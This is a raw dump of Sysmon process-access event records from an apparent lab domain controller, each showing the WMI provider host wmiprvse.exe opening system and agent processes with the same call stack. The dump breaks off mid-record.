16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030012Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030011Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030010Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030009Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030008Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030007Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030006Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030005Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030004Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030003Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030002Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030001Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030000Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029999Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029998Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029997Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029996Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029995Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029994Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029993Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program 